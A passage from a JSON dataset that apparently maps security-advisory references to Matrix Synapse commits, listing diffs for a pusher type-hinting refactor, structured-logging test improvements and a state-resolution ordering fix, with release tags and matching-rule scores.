"-_GET_PUSHERS_ALLOWED_KEYS = {", + "- \"app_display_name\",", + "- \"app_id\",", + "- \"data\",", + "- \"device_display_name\",", + "- \"kind\",", + "- \"lang\",", + "- \"profile_tag\",", + "- \"pushkey\",", + "-}", + "-", + "@@ -772,6 +761,3 @@ class PushersRestServlet(RestServlet):", + "- filtered_pushers = [", + "- {k: v for k, v in p.items() if k in _GET_PUSHERS_ALLOWED_KEYS}", + "- for p in pushers", + "- ]", + "+ filtered_pushers = [p.as_dict() for p in pushers]", + "diff --git a/synapse/rest/client/v1/pusher.py b/synapse/rest/client/v1/pusher.py", + "index 8fe83f321..89823fcc3 100644", + "--- a/synapse/rest/client/v1/pusher.py", + "+++ b/synapse/rest/client/v1/pusher.py", + "@@ -30,13 +30,2 @@ logger = logging.getLogger(__name__)", + "-ALLOWED_KEYS = {", + "- \"app_display_name\",", + "- \"app_id\",", + "- \"data\",", + "- \"device_display_name\",", + "- \"kind\",", + "- \"lang\",", + "- \"profile_tag\",", + "- \"pushkey\",", + "-}", + "-", + "@@ -56,5 +45,3 @@ class PushersRestServlet(RestServlet):", + "- filtered_pushers = [", + "- {k: v for k, v in p.items() if k in ALLOWED_KEYS} for p in pushers", + "- ]", + "+ filtered_pushers = [p.as_dict() for p in pushers]", + "diff --git a/synapse/storage/databases/main/__init__.py b/synapse/storage/databases/main/__init__.py", + "index 43660ec4f..871fb646a 100644", + "--- a/synapse/storage/databases/main/__init__.py", + "+++ b/synapse/storage/databases/main/__init__.py", + "@@ -151,5 +151,2 @@ class DataStore(", + " self._push_rules_enable_id_gen = IdGenerator(db_conn, \"push_rules_enable\", \"id\")", + "- self._pushers_id_gen = StreamIdGenerator(", + "- db_conn, \"pushers\", \"id\", extra_tables=[(\"deleted_pushers\", \"stream_id\")]", + "- )", + " self._group_updates_id_gen = StreamIdGenerator(", + "diff --git a/synapse/storage/databases/main/pusher.py b/synapse/storage/databases/main/pusher.py", + "index 7997242d9..77ba9d819 100644", + "--- a/synapse/storage/databases/main/pusher.py", + "+++ b/synapse/storage/databases/main/pusher.py", + "@@ -17,3 +17,3 @@", + " import logging", + "-from typing import Iterable, Iterator, List, Tuple", + "+from typing import TYPE_CHECKING, Any, Dict, Iterable, Iterator, List, Optional, Tuple", + "@@ -21,5 +21,13 @@ from canonicaljson import encode_canonical_json", + "+from synapse.push import PusherConfig, ThrottleParams", + " from synapse.storage._base import SQLBaseStore, db_to_json", + "+from synapse.storage.database import DatabasePool", + "+from synapse.storage.types import Connection", + "+from synapse.storage.util.id_generators import StreamIdGenerator", + "+from synapse.types import JsonDict", + " from synapse.util.caches.descriptors import cached, cachedList", + "+if TYPE_CHECKING:", + "+ from synapse.app.homeserver import HomeServer", + "+", + " logger = logging.getLogger(__name__)", + "@@ -28,3 +36,9 @@ logger = logging.getLogger(__name__)", + " class PusherWorkerStore(SQLBaseStore):", + "- def _decode_pushers_rows(self, rows: Iterable[dict]) -> Iterator[dict]:", + "+ def __init__(self, database: DatabasePool, db_conn: Connection, hs: \"HomeServer\"):", + "+ super().__init__(database, db_conn, hs)", + "+ self._pushers_id_gen = StreamIdGenerator(", + "+ db_conn, \"pushers\", \"id\", extra_tables=[(\"deleted_pushers\", \"stream_id\")]", + "+ )", + "+", + "+ def _decode_pushers_rows(self, rows: Iterable[dict]) -> Iterator[PusherConfig]:", + " \"\"\"JSON-decode the data in the rows returned from the `pushers` table", + "@@ -46,5 +60,5 @@ class PusherWorkerStore(SQLBaseStore):", + "- yield r", + "+ yield PusherConfig(**r)", + "- async def user_has_pusher(self, user_id):", + "+ async def user_has_pusher(self, user_id: str) -> bool:", + " ret = await self.db_pool.simple_select_one_onecol(", + "@@ -54,9 +68,11 @@ class PusherWorkerStore(SQLBaseStore):", + "- def get_pushers_by_app_id_and_pushkey(self, app_id, pushkey):", + "- return self.get_pushers_by({\"app_id\": app_id, \"pushkey\": pushkey})", + "+ async def get_pushers_by_app_id_and_pushkey(", + "+ self, app_id: str, pushkey: str", + "+ ) -> Iterator[PusherConfig]:", + "+ return await self.get_pushers_by({\"app_id\": app_id, \"pushkey\": pushkey})", + "- def get_pushers_by_user_id(self, user_id):", + "- return self.get_pushers_by({\"user_name\": user_id})", + "+ async def get_pushers_by_user_id(self, user_id: str) -> Iterator[PusherConfig]:", + "+ return await self.get_pushers_by({\"user_name\": user_id})", + "- async def get_pushers_by(self, keyvalues):", + "+ async def get_pushers_by(self, keyvalues: Dict[str, Any]) -> Iterator[PusherConfig]:", + " ret = await self.db_pool.simple_select_list(", + "@@ -85,3 +101,3 @@ class PusherWorkerStore(SQLBaseStore):", + "- async def get_all_pushers(self):", + "+ async def get_all_pushers(self) -> Iterator[PusherConfig]:", + " def get_pushers(txn):", + "@@ -161,3 +177,3 @@ class PusherWorkerStore(SQLBaseStore):", + " @cached(num_args=1, max_entries=15000)", + "- async def get_if_user_has_pusher(self, user_id):", + "+ async def get_if_user_has_pusher(self, user_id: str):", + " # This only exists for the cachedList decorator", + "@@ -168,3 +184,5 @@ class PusherWorkerStore(SQLBaseStore):", + " )", + "- async def get_if_users_have_pushers(self, user_ids):", + "+ async def get_if_users_have_pushers(", + "+ self, user_ids: Iterable[str]", + "+ ) -> Dict[str, bool]:", + " rows = await self.db_pool.simple_select_many_batch(", + "@@ -226,3 +244,3 @@ class PusherWorkerStore(SQLBaseStore):", + " async def update_pusher_failing_since(", + "- self, app_id, pushkey, user_id, failing_since", + "+ self, app_id: str, pushkey: str, user_id: str, failing_since: Optional[int]", + " ) -> None:", + "@@ -235,3 +253,5 @@ class PusherWorkerStore(SQLBaseStore):", + "- async def get_throttle_params_by_room(self, pusher_id):", + "+ async def get_throttle_params_by_room(", + "+ self, pusher_id: str", + "+ ) -> Dict[str, ThrottleParams]:", + " res = await self.db_pool.simple_select_list(", + "@@ -245,6 +265,5 @@ class PusherWorkerStore(SQLBaseStore):", + " for row in res:", + "- params_by_room[row[\"room_id\"]] = {", + "- \"last_sent_ts\": row[\"last_sent_ts\"],", + "- \"throttle_ms\": row[\"throttle_ms\"],", + "- }", + "+ params_by_room[row[\"room_id\"]] = ThrottleParams(", + "+ row[\"last_sent_ts\"], row[\"throttle_ms\"],", + "+ )", + "@@ -252,3 +271,5 @@ class PusherWorkerStore(SQLBaseStore):", + "- async def set_throttle_params(self, pusher_id, room_id, params) -> None:", + "+ async def set_throttle_params(", + "+ self, pusher_id: str, room_id: str, params: ThrottleParams", + "+ ) -> None:", + " # no need to lock because `pusher_throttle` has a primary key on", + "@@ -258,3 +279,3 @@ class PusherWorkerStore(SQLBaseStore):", + " {\"pusher\": pusher_id, \"room_id\": room_id},", + "- params,", + "+ {\"last_sent_ts\": params.last_sent_ts, \"throttle_ms\": params.throttle_ms},", + " desc=\"set_throttle_params\",", + "@@ -265,3 +286,3 @@ class PusherWorkerStore(SQLBaseStore):", + " class PusherStore(PusherWorkerStore):", + "- def get_pushers_stream_token(self):", + "+ def get_pushers_stream_token(self) -> int:", + " return self._pushers_id_gen.get_current_token()", + "@@ -270,14 +291,14 @@ class PusherStore(PusherWorkerStore):", + " self,", + "- user_id,", + "- access_token,", + "- kind,", + "- app_id,", + "- app_display_name,", + "- device_display_name,", + "- pushkey,", + "- pushkey_ts,", + "- lang,", + "- data,", + "- last_stream_ordering,", + "- profile_tag=\"\",", + "+ user_id: str,", + "+ access_token: Optional[int],", + "+ kind: str,", + "+ app_id: str,", + "+ app_display_name: str,", + "+ device_display_name: str,", + "+ pushkey: str,", + "+ pushkey_ts: int,", + "+ lang: Optional[str],", + "+ data: Optional[JsonDict],", + "+ last_stream_ordering: int,", + "+ profile_tag: str = \"\",", + " ) -> None:", + "@@ -313,3 +334,3 @@ class PusherStore(PusherWorkerStore):", + " \"add_pusher\",", + "- self._invalidate_cache_and_stream,", + "+ self._invalidate_cache_and_stream, # type: ignore", + " self.get_if_user_has_pusher,", + "@@ -319,6 +340,6 @@ class PusherStore(PusherWorkerStore):", + " async def delete_pusher_by_app_id_pushkey_user_id(", + "- self, app_id, pushkey, user_id", + "+ self, app_id: str, pushkey: str, user_id: str", + " ) -> None:", + " def delete_pusher_txn(txn, stream_id):", + "- self._invalidate_cache_and_stream(", + "+ self._invalidate_cache_and_stream( # type: ignore", + " txn, self.get_if_user_has_pusher, (user_id,)", + "diff --git a/synapse/storage/util/id_generators.py b/synapse/storage/util/id_generators.py", + "index 02d71302e..133c0e7a2 100644", + "--- a/synapse/storage/util/id_generators.py", + "+++ b/synapse/storage/util/id_generators.py", + "@@ -155,3 +155,3 @@ class StreamIdGenerator:", + "- def get_current_token(self):", + "+ def get_current_token(self) -> int:", + " \"\"\"Returns the maximum stream id such that all stream ids less than or", + "@@ -160,3 +160,3 @@ class StreamIdGenerator:", + " Returns:", + "- int", + "+ The maximum stream id.", + " \"\"\"", + "diff --git a/tests/push/test_email.py b/tests/push/test_email.py", + "index bcdcafa5a..961bf09de 100644", + "--- a/tests/push/test_email.py", + "+++ b/tests/push/test_email.py", + "@@ -211,3 +211,3 @@ class EmailPusherTests(HomeserverTestCase):", + " self.assertEqual(len(pushers), 1)", + "- last_stream_ordering = pushers[0][\"last_stream_ordering\"]", + "+ last_stream_ordering = pushers[0].last_stream_ordering", + "@@ -222,3 +222,3 @@ class EmailPusherTests(HomeserverTestCase):", + " self.assertEqual(len(pushers), 1)", + "- self.assertEqual(last_stream_ordering, pushers[0][\"last_stream_ordering\"])", + "+ self.assertEqual(last_stream_ordering, pushers[0].last_stream_ordering)", + "@@ -240,2 +240,2 @@ class EmailPusherTests(HomeserverTestCase):", + " self.assertEqual(len(pushers), 1)", + "- self.assertTrue(pushers[0][\"last_stream_ordering\"] > last_stream_ordering)", + "+ self.assertTrue(pushers[0].last_stream_ordering > last_stream_ordering)", + "diff --git a/tests/push/test_http.py b/tests/push/test_http.py", + "index cb3245d8c..60f0820cf 100644", + "--- a/tests/push/test_http.py", + "+++ b/tests/push/test_http.py", + "@@ -146,3 +146,3 @@ class HTTPPusherTests(HomeserverTestCase):", + " self.assertEqual(len(pushers), 1)", + "- last_stream_ordering = pushers[0][\"last_stream_ordering\"]", + "+ last_stream_ordering = pushers[0].last_stream_ordering", + "@@ -157,3 +157,3 @@ class HTTPPusherTests(HomeserverTestCase):", + " self.assertEqual(len(pushers), 1)", + "- self.assertEqual(last_stream_ordering, pushers[0][\"last_stream_ordering\"])", + "+ self.assertEqual(last_stream_ordering, pushers[0].last_stream_ordering)", + "@@ -178,4 +178,4 @@ class HTTPPusherTests(HomeserverTestCase):", + " self.assertEqual(len(pushers), 1)", + "- self.assertTrue(pushers[0][\"last_stream_ordering\"] > last_stream_ordering)", + "- last_stream_ordering = pushers[0][\"last_stream_ordering\"]", + "+ self.assertTrue(pushers[0].last_stream_ordering > last_stream_ordering)", + "+ last_stream_ordering = pushers[0].last_stream_ordering", + "@@ -200,3 +200,3 @@ class HTTPPusherTests(HomeserverTestCase):", + " self.assertEqual(len(pushers), 1)", + "- self.assertTrue(pushers[0][\"last_stream_ordering\"] > last_stream_ordering)", + "+ self.assertTrue(pushers[0].last_stream_ordering > last_stream_ordering)", + "diff --git a/tests/rest/admin/test_user.py b/tests/rest/admin/test_user.py", + "index 582f98322..df62317e6 100644", + "--- a/tests/rest/admin/test_user.py", + "+++ b/tests/rest/admin/test_user.py", + "@@ -768,3 +768,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", + " self.assertEqual(len(pushers), 1)", + "- self.assertEqual(\"@bob:test\", pushers[0][\"user_name\"])", + "+ self.assertEqual(\"@bob:test\", pushers[0].user_name)" + ], + "changed_files": [ + "changelog.d/8940.misc", + "mypy.ini", + "synapse/push/__init__.py", + "synapse/push/emailpusher.py", + "synapse/push/httppusher.py", + "synapse/push/pusher.py", + "synapse/push/pusherpool.py", + "synapse/replication/slave/storage/_slaved_id_tracker.py", + "synapse/replication/slave/storage/pushers.py", + "synapse/rest/admin/users.py", + "synapse/rest/client/v1/pusher.py", + "synapse/storage/databases/main/__init__.py", + "synapse/storage/databases/main/pusher.py", + "synapse/storage/util/id_generators.py", + "tests/push/test_email.py", + "tests/push/test_http.py", + "tests/rest/admin/test_user.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8940": "" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8940, 8940", + "relevance": 32 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8940", + "relevance": 2 + } + ] + }, + { + "commit_id": "3af0672350965b4fddf3aad2904795bbd0199c30", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607689501, + "hunks": 11, + "message": "Improve tests for structured logging. (#8916)", + "diff": [ + "diff --git a/changelog.d/8916.misc b/changelog.d/8916.misc", + "new file mode 100644", + "index 000000000..c71ef480e", + "--- /dev/null", + "+++ b/changelog.d/8916.misc", + "@@ -0,0 +1 @@", + "+Improve structured logging tests.", + "diff --git a/tests/logging/test_terse_json.py b/tests/logging/test_terse_json.py", + "index 73f469b80..f6e7e5fda 100644", + "--- a/tests/logging/test_terse_json.py", + "+++ b/tests/logging/test_terse_json.py", + "@@ -20,2 +20,3 @@ from io import StringIO", + " from synapse.logging._terse_json import JsonFormatter, TerseJsonFormatter", + "+from synapse.logging.context import LoggingContext, LoggingContextFilter", + "@@ -26,2 +27,13 @@ from tests.unittest import TestCase", + " class TerseJsonTestCase(LoggerCleanupMixin, TestCase):", + "+ def setUp(self):", + "+ self.output = StringIO()", + "+", + "+ def get_log_line(self):", + "+ # One log message, with a single trailing newline.", + "+ data = self.output.getvalue()", + "+ logs = data.splitlines()", + "+ self.assertEqual(len(logs), 1)", + "+ self.assertEqual(data.count(\"\\n\"), 1)", + "+ return json.loads(logs[0])", + "+", + " def test_terse_json_output(self):", + "@@ -30,5 +42,3 @@ class TerseJsonTestCase(LoggerCleanupMixin, TestCase):", + " \"\"\"", + "- output = StringIO()", + "-", + "- handler = logging.StreamHandler(output)", + "+ handler = logging.StreamHandler(self.output)", + " handler.setFormatter(TerseJsonFormatter())", + "@@ -38,8 +48,3 @@ class TerseJsonTestCase(LoggerCleanupMixin, TestCase):", + "- # One log message, with a single trailing newline.", + "- data = output.getvalue()", + "- logs = data.splitlines()", + "- self.assertEqual(len(logs), 1)", + "- self.assertEqual(data.count(\"\\n\"), 1)", + "- log = json.loads(logs[0])", + "+ log = self.get_log_line()", + "@@ -59,5 +64,3 @@ class TerseJsonTestCase(LoggerCleanupMixin, TestCase):", + " \"\"\"", + "- output = StringIO()", + "-", + "- handler = logging.StreamHandler(output)", + "+ handler = logging.StreamHandler(self.output)", + " handler.setFormatter(TerseJsonFormatter())", + "@@ -69,8 +72,3 @@ class TerseJsonTestCase(LoggerCleanupMixin, TestCase):", + "- # One log message, with a single trailing newline.", + "- data = output.getvalue()", + "- logs = data.splitlines()", + "- self.assertEqual(len(logs), 1)", + "- self.assertEqual(data.count(\"\\n\"), 1)", + "- log = json.loads(logs[0])", + "+ log = self.get_log_line()", + "@@ -98,5 +96,3 @@ class TerseJsonTestCase(LoggerCleanupMixin, TestCase):", + " \"\"\"", + "- output = StringIO()", + "-", + "- handler = logging.StreamHandler(output)", + "+ handler = logging.StreamHandler(self.output)", + " handler.setFormatter(JsonFormatter())", + "@@ -106,8 +102,27 @@ class TerseJsonTestCase(LoggerCleanupMixin, TestCase):", + "- # One log message, with a single trailing newline.", + "- data = output.getvalue()", + "- logs = data.splitlines()", + "- self.assertEqual(len(logs), 1)", + "- self.assertEqual(data.count(\"\\n\"), 1)", + "- log = json.loads(logs[0])", + "+ log = self.get_log_line()", + "+", + "+ # The terse logger should give us these keys.", + "+ expected_log_keys = [", + "+ \"log\",", + "+ \"level\",", + "+ \"namespace\",", + "+ ]", + "+ self.assertCountEqual(log.keys(), expected_log_keys)", + "+ self.assertEqual(log[\"log\"], \"Hello there, wally!\")", + "+", + "+ def test_with_context(self):", + "+ \"\"\"", + "+ The logging context should be added to the JSON response.", + "+ \"\"\"", + "+ handler = logging.StreamHandler(self.output)", + "+ handler.setFormatter(JsonFormatter())", + "+ handler.addFilter(LoggingContextFilter(request=\"\"))", + "+ logger = self.get_logger(handler)", + "+", + "+ with LoggingContext() as context_one:", + "+ context_one.request = \"test\"", + "+ logger.info(\"Hello there, %s!\", \"wally\")", + "+", + "+ log = self.get_log_line()", + "@@ -118,2 +133,4 @@ class TerseJsonTestCase(LoggerCleanupMixin, TestCase):", + " \"namespace\",", + "+ \"request\",", + "+ \"scope\",", + " ]", + "@@ -121 +138,3 @@ class TerseJsonTestCase(LoggerCleanupMixin, TestCase):", + " self.assertEqual(log[\"log\"], \"Hello there, wally!\")", + "+ self.assertEqual(log[\"request\"], \"test\")", + "+ self.assertIsNone(log[\"scope\"])" + ], + "changed_files": [ + "changelog.d/8916.misc", + "tests/logging/test_terse_json.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8916": "" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8916, 8916", + "relevance": 32 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8916", + "relevance": 2 + } + ] + }, + { + "commit_id": "5e7d75daa2d53ea74c75f9a0db52c5590fc22038", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608303634, + "hunks": 4, + "message": "Fix mainline ordering in state res v2 (#8971) This had two effects 1) it'd give the wrong answer and b) would iterate *all* power levels in the auth chain of each event. The latter of which can be *very* expensive for certain types of IRC bridge rooms that have large numbers of power level changes.", + "diff": [ + "diff --git a/changelog.d/8971.bugfix b/changelog.d/8971.bugfix", + "new file mode 100644", + "index 000000000..c3e44b8c0", + "--- /dev/null", + "+++ b/changelog.d/8971.bugfix", + "@@ -0,0 +1 @@", + "+Fix small bug in v2 state resolution algorithm, which could also cause performance issues for rooms with large numbers of power levels.", + "diff --git a/synapse/state/v2.py b/synapse/state/v2.py", + "index f85124bf8..e585954bd 100644", + "--- a/synapse/state/v2.py", + "+++ b/synapse/state/v2.py", + "@@ -660,3 +660,3 @@ async def _get_mainline_depth_for_event(", + " while tmp_event:", + "- depth = mainline_map.get(event.event_id)", + "+ depth = mainline_map.get(tmp_event.event_id)", + " if depth is not None:", + "diff --git a/tests/state/test_v2.py b/tests/state/test_v2.py", + "index 09f4f32a0..77c72834f 100644", + "--- a/tests/state/test_v2.py", + "+++ b/tests/state/test_v2.py", + "@@ -90,3 +90,3 @@ class FakeEvent:", + " \"prev_events\": [(p, {}) for p in prev_events],", + "- \"event_id\": self.node_id,", + "+ \"event_id\": self.event_id,", + " \"sender\": self.sender,", + "@@ -383,2 +383,57 @@ class StateTestCase(unittest.TestCase):", + "+ def test_mainline_sort(self):", + "+ \"\"\"Tests that the mainline ordering works correctly.", + "+ \"\"\"", + "+", + "+ events = [", + "+ FakeEvent(", + "+ id=\"T1\", sender=ALICE, type=EventTypes.Topic, state_key=\"\", content={}", + "+ ),", + "+ FakeEvent(", + "+ id=\"PA1\",", + "+ sender=ALICE,", + "+ type=EventTypes.PowerLevels,", + "+ state_key=\"\",", + "+ content={\"users\": {ALICE: 100, BOB: 50}},", + "+ ),", + "+ FakeEvent(", + "+ id=\"T2\", sender=ALICE, type=EventTypes.Topic, state_key=\"\", content={}", + "+ ),", + "+ FakeEvent(", + "+ id=\"PA2\",", + "+ sender=ALICE,", + "+ type=EventTypes.PowerLevels,", + "+ state_key=\"\",", + "+ content={", + "+ \"users\": {ALICE: 100, BOB: 50},", + "+ \"events\": {EventTypes.PowerLevels: 100},", + "+ },", + "+ ),", + "+ FakeEvent(", + "+ id=\"PB\",", + "+ sender=BOB,", + "+ type=EventTypes.PowerLevels,", + "+ state_key=\"\",", + "+ content={\"users\": {ALICE: 100, BOB: 50}},", + "+ ),", + "+ FakeEvent(", + "+ id=\"T3\", sender=BOB, 